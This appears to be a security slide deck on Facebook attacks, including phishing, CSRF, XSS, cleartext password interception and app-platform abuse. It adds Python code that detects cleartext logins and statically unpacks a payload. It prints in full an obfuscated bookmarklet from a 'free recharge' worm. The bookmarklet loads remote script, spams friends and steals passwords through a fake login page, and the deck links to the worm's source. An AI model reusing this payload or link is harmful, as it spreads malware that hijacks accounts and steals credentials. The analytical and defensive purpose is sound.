facebook attacks
Phishing
CSRF attack
JavaScript
XSS
Facebook Phishing
Facebook CSRF attack
Third party app server
There are many other attacks possible like
• Brute forcing
• Cookie stealing
• Commercial Data mining
• Database Reverse-Engineering
Password Interception
• The fact that the username and password were sent in clear text is a security vulnerability.
• There are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.
• Also the tabnabbing and CSRF have gained popularity over the open platform.
Current Facebook Precaution:
Facebook currently takes no steps to protect user passwords in transit.
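The password-interception point above is something a network defender can check for directly: any login form submitted over plain http:// carries the credential in a form the next hop can read. The following is an added example, not part of the original slides, that scans proxy-style request records and flags POSTs to a login page that carry a password field without TLS. The log line format, the sample lines and the set of password field names are assumptions made for the example.

```python
"""Flag HTTP login submissions whose credentials travelled without TLS.

Added example (not from the slides). Each constructed log line has the
assumed shape "<client> <METHOD> <url> <form-body>"; a body of "-" means
the request had no form body.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed sample records; the first one is the case the slides describe:
# a login POST over plain http, so "pass=..." is readable on the wire.
SAMPLE_LOG = """\
10.0.0.5 POST http://www.facebook.com/login.php email=alice%40example.com&pass=hunter2
10.0.0.5 POST https://www.facebook.com/login.php email=alice%40example.com&pass=hunter2
10.0.0.7 GET http://www.facebook.com/profile.php?id=100000781542573 -
10.0.0.9 POST http://example.org/search q=recharge
"""

# Assumed field names that commonly carry a password in a login form.
PASSWORD_FIELDS = {"pass", "password", "passwd", "pwd"}


def parse_line(line):
    """Split one record into its four fields; return None if malformed."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    client, method, url, body = parts
    return {"client": client, "method": method, "url": url, "body": body}


def is_cleartext_credential(entry):
    """True when a POST over a non-https URL carries a password field."""
    if entry["method"] != "POST":
        return False
    if urlsplit(entry["url"]).scheme == "https":
        return False  # encrypted in transit, not what we are looking for
    fields = set(parse_qs(entry["body"]))
    return bool(fields & PASSWORD_FIELDS)


def find_cleartext_logins(log_text):
    """Return (client, host) pairs for every cleartext credential submission.

    The password value itself is deliberately not returned or logged, so the
    detector does not become a second place where credentials are stored.
    """
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_cleartext_credential(entry):
            hits.append((entry["client"], urlsplit(entry["url"]).netloc))
    return hits


if __name__ == "__main__":
    for client, host in find_cleartext_logins(SAMPLE_LOG):
        print(f"cleartext login from {client} to {host}")
```

Only the first record is reported: the second is the same login over https, the third is a GET with no body, and the fourth is a POST with no password field. On a real network the same check is what a proxy or IDS signature for "password submitted over HTTP" implements.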
javascript:d=document;c=d.createElement(%22script
%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su
%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)
FREE!! CELLPHONE RECHARGE::..
This Script very popularly seen on Facebook, Orkut and Many
other Social Networking sites.
Analysing and Demo
What does It do?
• It is sending messages to all my friends to Recharge from account
• It is adding comments in Albums of my friends
• It is creating Threads in the Communities I Joined saying that “Recharge this”; also it is adding some other Communities to my list
• Redirects you to the Fake FB login page after 10-15 mins, stealing your password
Source Script @ http://www.mediafire.com/?t2lagmvsvftww28
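The bookmarklet shown above hides where its second-stage script comes from by percent-encoding the quotes and splitting the URL into concatenated string fragments. As an added example (not code from the slides), the following unpacks that text statically, without executing any of it, so an analyst can see which address the page would load a script from. The bookmarklet text is copied from the slide; the helper names are this example's own.

```python
"""Statically unpack the obfuscated bookmarklet to reveal the script it loads.

Added example, not from the slides. Nothing here is executed as JavaScript:
the payload is percent-decoded, the expression assigned to c.src is pulled
out, and its "..."+"..." fragments are joined back into one string.
"""
import re
from urllib.parse import unquote

# The bookmarklet exactly as it appears on the slide.
BOOKMARKLET = (
    "javascript:d=document;c=d.createElement(%22script"
    "%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su"
    "%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)"
)


def decode_bookmarklet(text):
    """Strip the javascript: scheme and percent-decode the remaining payload."""
    if text.lower().startswith("javascript:"):
        text = text[len("javascript:"):]
    return unquote(text)


def extract_src_expression(js):
    """Return the right-hand side of the first '.src = ...' assignment, or None."""
    m = re.search(r'\.src\s*=\s*([^;]+)', js)
    return m.group(1) if m else None


def fold_string_concat(expr):
    """Join a chain of double-quoted literals separated by '+' into one string.

    Only plain literals are handled; if anything else appears in the
    expression (a variable, a function call) the result is None rather
    than a guess, because then the URL is not recoverable statically.
    """
    parts = re.findall(r'"([^"]*)"', expr)
    leftover = re.sub(r'"[^"]*"', '', expr).strip('+ ')
    if not parts or leftover:
        return None
    return "".join(parts)


def remote_script_url(bookmarklet):
    """Recover the URL of the remotely loaded script, or None if not static."""
    js = decode_bookmarklet(bookmarklet)
    expr = extract_src_expression(js)
    return fold_string_concat(expr) if expr else None


def loads_remote_script(bookmarklet):
    """True when the payload creates a <script> element and points it elsewhere."""
    js = decode_bookmarklet(bookmarklet)
    return 'createElement("script")' in js and remote_script_url(bookmarklet) is not None


if __name__ == "__main__":
    print("decoded:", decode_bookmarklet(BOOKMARKLET))
    print("loads script from:", remote_script_url(BOOKMARKLET))
```

The recovered address is a URL-shortener link, so the script actually fetched is whatever that link redirects to at the time; this is exactly why such worms can swap payloads without the bookmarklet text changing. The two tells to key on when triaging pasted "free recharge" snippets are the `createElement("script")` call and a `src` assembled from fragments.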
http://www.facebook.com/profile.php?id=100000781542573
www.facebook.com/username
The Facebook Platform
API – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs.
FBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application.
FQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.
How to add an
application in
Facebook
How can this be Used For Exploiting?
• You can upload your own application of any type.
• So doesn’t this strike you as something of a hacker’s interest?
How can this be Used For Exploiting?
THANK YOU